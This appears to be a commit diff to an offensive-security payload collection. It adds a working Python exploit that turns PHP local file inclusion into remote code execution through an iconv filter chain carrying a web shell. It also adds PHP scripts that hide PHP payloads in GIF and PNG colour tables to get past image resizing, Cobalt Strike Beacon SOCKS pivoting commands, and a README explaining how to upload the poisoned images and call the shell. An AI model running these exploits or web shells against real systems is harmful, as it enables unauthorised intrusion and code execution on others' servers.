LFI2RCE - Picture Compression - SOCKS5 CS
|
@ -0,0 +1,60 @@
|
|||
import requests
|
||||
|
||||
url = "http://localhost:8000/chall.php"
|
||||
file_to_use = "/etc/passwd"
|
||||
command = "id"
|
||||
|
||||
#<?=`$_GET[0]`;;?>
|
||||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
|
||||
|
||||
conversions = {
|
||||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
|
||||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
|
||||
'C': 'convert.iconv.UTF8.CSISO2022KR',
|
||||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
|
||||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
|
||||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
|
||||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
|
||||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
|
||||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
|
||||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
|
||||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
|
||||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
|
||||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
|
||||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
|
||||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
|
||||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
|
||||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
|
||||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
|
||||
}
|
||||
|
||||
|
||||
# generate some garbage base64
|
||||
filters = "convert.iconv.UTF8.CSISO2022KR|"
|
||||
filters += "convert.base64-encode|"
|
||||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
|
||||
for c in base64_payload[::-1]:
|
||||
filters += conversions[c] + "|"
|
||||
# decode and reencode to get rid of everything that isn't valid base64
|
||||
filters += "convert.base64-decode|"
|
||||
filters += "convert.base64-encode|"
|
||||
# get rid of equal signs
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
filters += "convert.base64-decode"
|
||||
|
||||
final_payload = f"php://filter/{filters}/resource={file_to_use}"
|
||||
|
||||
with open('payload', 'w') as f:
|
||||
f.write(final_payload)
|
||||
|
||||
r = requests.get(url, params={
|
||||
"0": command,
|
||||
"action": "include",
|
||||
"file": final_payload
|
||||
})
|
||||
|
||||
print(r.text)
|
|
@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
|
|||
```powershell
|
||||
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
|
||||
beacon > socks [PORT]
|
||||
beacon > socks [port]
|
||||
beacon > socks [port] [socks4]
|
||||
beacon > socks [port] [socks5]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
|
||||
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
|
||||
|
||||
# Proxy browser traffic through a specified Internet Explorer process.
|
||||
beacon > browserpivot [pid] [x86|x64]
|
||||
|
|
Before Width: | Height: | Size: 7.2 KiB After Width: | Height: | Size: 7.2 KiB |
Before Width: | Height: | Size: 1.1 KiB After Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 377 B After Width: | Height: | Size: 377 B |
Before Width: | Height: | Size: 174 B After Width: | Height: | Size: 174 B |
|
@ -1,7 +1,6 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
|
||||
Bulletproof Jpegs Generator
|
||||
Copyright (C) 2012 Damien "virtualabs" Cauquil
|
||||
|
||||
|
@ -18,7 +17,11 @@
|
|||
You should have received a copy of the GNU General Public License along
|
||||
with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
|
||||
|
||||
-------------
|
||||
# How to use
|
||||
b.php?c=ls
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
||||
"""
|
||||
from __future__ import print_function
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
<?php
|
||||
// createGIFwithGlobalColorTable.php
|
||||
$_file="example.gif";
|
||||
$_payload="<?php evil();?>";
|
||||
$_width=200;
|
||||
$_height=200;
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
$im = imagecreate($_width, $_height);
|
||||
$_hex=unpack('H*',$_payload);
|
||||
|
||||
$colors_hex=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($colors_hex); $i++){
|
||||
$_color_chunks=str_split($colors_hex[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
}
|
||||
|
||||
imagegif($im,$_file);
|
||||
?>
|
|
@ -0,0 +1,28 @@
|
|||
<?php
|
||||
//createPNGwithPLTE.php
|
||||
// bypass imageCreateFromPng and imagepng
|
||||
$_payload="<?php phpinfo()?> ";
|
||||
$_pay_len=strlen($_payload);
|
||||
if(strlen($_payload)%3!=0){
|
||||
echo "payload%3==0 !"; exit();
|
||||
}
|
||||
|
||||
|
||||
$width=$_pay_len/3;
|
||||
$height=20;
|
||||
//$im = imageCreateFromPng("existing.png");
|
||||
$im = imagecreate($width, $height);
|
||||
|
||||
$_hex=unpack('H*',$_payload);
|
||||
$_chunks=str_split($_hex[1], 6);
|
||||
|
||||
for($i=0; $i < count($_chunks); $i++){
|
||||
|
||||
$_color_chunks=str_split($_chunks[$i], 2);
|
||||
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
|
||||
|
||||
imagesetpixel($im,$i,1,$color);
|
||||
|
||||
}
|
||||
|
||||
imagepng($im,"example.png");
|
|
@ -1,5 +0,0 @@
|
|||
# How to use
|
||||
b.php?c=ls
|
||||
|
||||
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
|
@ -9,7 +9,7 @@
|
|||
* [Defaults extensions](#defaults-extensions)
|
||||
* [Upload tricks](#upload-tricks)
|
||||
* [Filename vulnerabilities](#filename-vulnerabilities)
|
||||
* [Picture upload with LFI](#picture-upload-with-lfi)
|
||||
* [Picture compression](#picture-compression-)
|
||||
* [Configuration Files](#configuration-files)
|
||||
* [CVE - Image Tragik](#cve---image-tragik)
|
||||
* [CVE - FFMpeg](#cve---ffmpeg)
|
||||
|
@ -107,12 +107,16 @@ Also you upload:
|
|||
- HTML/SVG files to trigger an XSS
|
||||
- EICAR file to check the presence of an antivirus
|
||||
|
||||
### Picture upload with LFI
|
||||
### Picture Compression
|
||||
|
||||
Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
|
||||
|
||||
- Picture Metadata, hide the payload inside a comment tag in the metadata.
|
||||
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
|
||||
- [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
|
||||
- [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
|
||||
- [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
|
||||
|
||||
|
||||
### Picture with custom metadata
|
||||
|
||||
|
@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
|||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
||||
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
|